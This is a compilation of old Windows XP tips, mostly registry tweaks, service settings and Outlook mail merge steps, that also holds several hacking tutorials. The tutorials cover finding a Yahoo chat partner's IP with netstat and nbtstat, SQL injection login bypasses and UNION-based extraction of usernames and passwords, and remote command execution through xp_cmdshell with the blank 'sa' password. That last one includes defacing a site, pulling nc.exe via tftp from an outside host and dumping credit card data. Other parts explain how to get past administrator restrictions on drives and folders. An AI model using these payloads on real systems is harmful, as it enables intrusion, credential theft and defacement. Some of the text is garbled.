NOTE: If you have difficulty getting to the Safe mode menu command, press F8 repeatedly after you turn on the computer.

3. Select the "Safe Mode" menu option from the Startup menu, and then press ENTER

4. Click Yes to acknowledge that Windows is running in safe mode.

5. Run the Disk Defragmenter tool. After Disk Defragmenter finishes restart your computer

Print address labels using Outlook and Word

Start Outlook

1. In the Navigation Pane (Navigation Pane: The column on the left side of the Outlook window that includes panes such as Shortcuts or Mail and the shortcutsor folders within each pane. Click a folder to show the items in the folder.), click Contacts.

2. Click the contact that has the address that you want to print on the envelope.
3. On the Tools menu, click Mail Merge.
4. In the Mail Merge Contacts dialog box, under Contacts, click Only selected contacts.
5. Under Fields to merge, click All Contacts fields if it is not currently selected.

6. Under Document file, click New document if it is not currently selected.
7. Under Merge options, in the Document type list, click Envelopes.
8. Under Merge options, in the Merge to list, click New Document.
9. Click OK.

Start Microsoft Word, when Word starts, click OK when you see the following dialog box.
1. In the Mail Merge Helper dialog box, click Setup.
2. In the Envelope Options dialog box, click the Envelope Options tab, and then select the envelope size and font that you want.
3. Click the Printing Options tab, select the printer feed method that you want, and then click OK.
4. In the Mail Merge Helper dialog box, click Close.

5. When the envelope appears, type your return address at the top left corner of the envelope. 6. Click the middle of the envelope where the recipient's address appears.
7. On the Mail Merge toolbar, click Insert Address Block .
8. In the Insert Address Block dialog box, select the address elements that you want, and then click OK. This inserts < > in the middle of the envelope.
9. On the Mail Merge toolbar, click View Merged Data. The contact's name and address appear.
10.Make sure that your printer has envelopes ready to print. See your printer's manual for instructions.
11.On the Standard toolbar, click Save , and then click Print .

Please visit the following web page for further information:http://office.microsoft.com/en-us/assistance/HA011309901033.aspx

Make Your Windows XP boot faster !!

Stop unneeded Startup Services and Make XP boot faster !

Along with the core operating system and programs that Windows XP runs when it starts, there is also a host of services involved. Many of these services are necessary for Windows XP to operate correctly. However, many of them are for features in Windows XP that you may not use at all. You can disable any service that you do not want to run. The fewer services that run, the more quickly Windows XP will boot.

To reduce the number of services that start on bootup, you can access two different areas of Windows XP.

The first is the System Configuration Utility. You can do that by entering the command “msconfig” in the run menu.
Start [1] Run [1] “msconfig” (without quotes) || Hit Enter
The Services tab shows you the services that start when the computer boots. You can stop a service from starting by simply clearing the check box next to the service and clicking OK.
However, before you do so, there is another way to disable services that you may prefer because the interface gives you more information about the service in question.

Open Control Panel==>Administrative Tools==>Services or
Start==>Run==>“services.msc” and Hit Enter

Take a quick look at common services you may want to live without:
Automatic Updates: This service enables Windows XP to check the Web automatically for updates. If you don't want to use Automatic Updates, you can disable the service.
Computer Browser: If your computer is not on a network, you don't need this service.
If you are on a network, leave it alone.

DHCP Client: If you are not on a network, you do not need this service. If you are on a small workgroup, you can still increase boot time by configuring manual IP.
DNS Client: If you are not on a network, you do not need this service.

Error Reporting and Event Log: You don't have to use these services but they can be very helpful, so I would leave them configured as automatic.
Fax: If you don't use your computer for fax services, you can disable this one.
Help and Support: Disable if you never use the Windows XP Help and Support Center.
IMAPI CD-Burning COM: This service enables you to burn CDs on your computer. If you never burn CDs, you can disable the service without any second thoughts.
Indexing Service: Your computer keeps an index of all the files. But if you rarely
search for files, the service is just a resource hog. You can stop it
Windows Firewall/Internet Connection Sharing: If you do not use these features, please disable.
Infrared Monitor: If you do not use infrared devices, you can disable this service.
Messenger: This service sends alert messages on a local area network (it is not the same as Windows Messenger). If you are not on a network, you can disable this service.
Print Spooler: If you do not do any printing from the computer, you can disable this service. If you print, make sure you leave it as automatic.
Remote Registry: This service allows remote users to modify the Registry on your computer. If you are not on a network, you can disable this service.
System Restore Service: This service allows you to use System Restore. If you have turned off System Restore anyway, you do not need to turn off the service.
Themes: If you do not use themes, you can disable this service.
Windows Image Acquisition: If you do not use scanners or digital cameras, you can
disable.

Wireless Zero Configuration: If do not use wireless networking devices, you can disable

Deleting Recycle Bin

* launch d registry...
* open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
* to add a rename and delete option, change the Dword attribute to 70 01 00 20
* refresh and reboot the system..... u r done.

Rename ur Recycle bin

go to -> Run -> regedit
->HKEY_CLASSES_ROOT
->CLSID
->{645FF040-5081-101B-9F08-00AA002F954E}
->ShellFolder->
on the right hand side u will find

->"Attribute REG_BINARY 40 01 00 20"

double click on that & change the value of 40 to 50,this will be
" Attribute REG_BINARY 50 01 00 20"

& delete the "CallForAttributes"

Now right click on the Recycle bin and rename it... thats it

Hack a Yahoo Account While Chatting

Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1E> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.



So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

Wanna Hack websites???

Ok ppl...many guys ve asked me hw 2 hack websites n email ids n stuff....
so beginners heres ur chance....
I hope dis guide helps u:
Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card info secured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

The article is divided into two parts:
1. Using the HTTP port 80
2. Using the MS SQL port 1434

Part I – Using HTTP port 80 ( Or better would be malformed URLs)
----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.

login.htm

logincheck.asp

<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>

Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!

The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page.
The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

>From the error its clear that first table is 'logintable'.

It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

Jun 30 xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.


Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.

Jun 30 C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’” delete

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------

<*> Change the default password for sa.
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites like

http://sqlsecurity.com
http://www.cert.org

20 things you didn't know about Windows XP

You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type ' gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care – some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exeuser32.dll, LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- justdouble click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad orEdit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at thecommand line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/ControlPanel/ Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to http://www.whatismyip.com/ -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/ControlPanel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder youcan arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2006 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2007.

How to disable the Shut Down option

This trick involves editing the registry, so please make backups. Launch regedit.exe and go to :
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorer
In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify.

Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:
This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.
Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.
REGEDIT4 [HKEY_CURRENT_USER/Software/

Microsoft/Windows/

CurrentVersion/

PoliciesExplorer] "NoClose"="1"

Disabling Display of Drives in My Computer

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My computer go to :

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorer
Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply
delete this DWORD item. It's .reg file is as follows:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersio
nPoliciesExplorer] "NoDrives"=dword:03ffffff

Making the Internet Explorer & the Explorer Toolbars Fancy

The Internet Explorer toolbar looks pretty simple. Want to make it fancy and kewl? Why not add a background image to it. To do this kewl hack launch the Windows Registry Editor and go to the following key:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Toolbar\.
Now in the right pane create a new String Value and name it BackBitmap and modify it's value to the path of the Bitmap you want to dress it up with by rightclicking on it and choosing Modify.
When you reboot the Internet Explorer and the Windows Explorer toolbars will have a new look.

Internet Explorer 5 Hidden Features

Microsoft Internet Explorer 5 has several hidden features which can be controlled using the Windows Registry. Open your registry and scroll down to the following key: HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
Create a new DWORD value named x(See complete list of values of x below) and modify it's value to 1 to enable it and to 0 to disable it.

NoBrowserClose : Disable the option of closing Internet Explorer.
NoBrowserContextMenu : Disable right-click context menu.
NoBrowserOptions : Disable the Tools / Internet Options menu.
NoBrowserSaveAs : Disable the ability to Save As.
NoFavorites : Disable the Favorites.
NoFileNew : Disable the File / New command.
NoFileOpen : Disable the File / Open command.
NoFindFiles : Disable the Find Files command.
NoSelectDownloadDir : Disable the option of selecting a download directory.
NoTheaterMode : Disable the Full Screen view option.

Accessing restricted folders

There is yet another way of accessing restricted folders. Use see, DOS has a lovely command known as START. Its general syntax is:

START application_path It does do what it seems to do, start applications. So in you have access to DOS then you can type in the START command to get access to the restricted folder. Now mostly access to DOS too would be blocked. So again you can use the shortcut trick to launch,
c:\command.com or c:\windows\command.com. (Command.com is the file which launches MS DOS).

Accessing Restricted Drives

The problem with most system administrators is that they think that the users or Hackers too are stupid. Almost all system administrators use the Registry Trick (Explained Earlier) to hide all drives in My Computer. So in order to unhide or display all drives, simply delete that particular key.(Refer to beginning of Untold Secrets Section.)
Some systems have the floppy disk disabled through the BIOS. On those systems if the BIOS is protected, you may need to crack the BIOS password. (For that Refer to the Windows Hacking Chapter). Sometimes making drives readable (Removing R +) and then creating Shortcuts to them also helps us to get access to them. Further Changing your Operating System's Looks by editing .htt files

If you have installed Windows Desktop Update and have the view as web Page option enabled, you can customise the way the folder looks by selecting View > Customise this folder. Here you can change the background and other things about that particular folder. Well that is pretty lame, right? We hackers already knowthings as lame as that. Read on for some kewl stuff.
Well, you could also change the default that is stored in a Hidden HTML Template file (I think so..) which is nothing but a HTML document with a .htt extension. This .htt file is found at:
%systemroot%\web\folder.htt.

The %systemroot% stands for the drive in which Windows is Installed, which is normally C:
You can edit these .htt files almost just like you edit normal .HTM or .HTML files. Simply open them in an ASCII editor like Notepad. The following is a list of .htt files on your system which control various folders and which can be edited to customise the way various folders look.
controlp.htt Control Panel

printers.htt Printers

mycomp.htt My Computer

safemode.htt Safe Mode

All these files are found in the web folder in %systemfolder%. The folder.htt file has a line:
'Here's a good place to add a few lines of your own" which is the place where you can add your own A HREF links. These links would then appear in the folder whose folder.htt file you
edited. All this might sound really easy and simple, but you see these .htt files do not contain normal HTML code, instead they contain a mixture of HTML and web bots. Hence they can be difficult for newbies to understand.

Accessing Restricted Drives

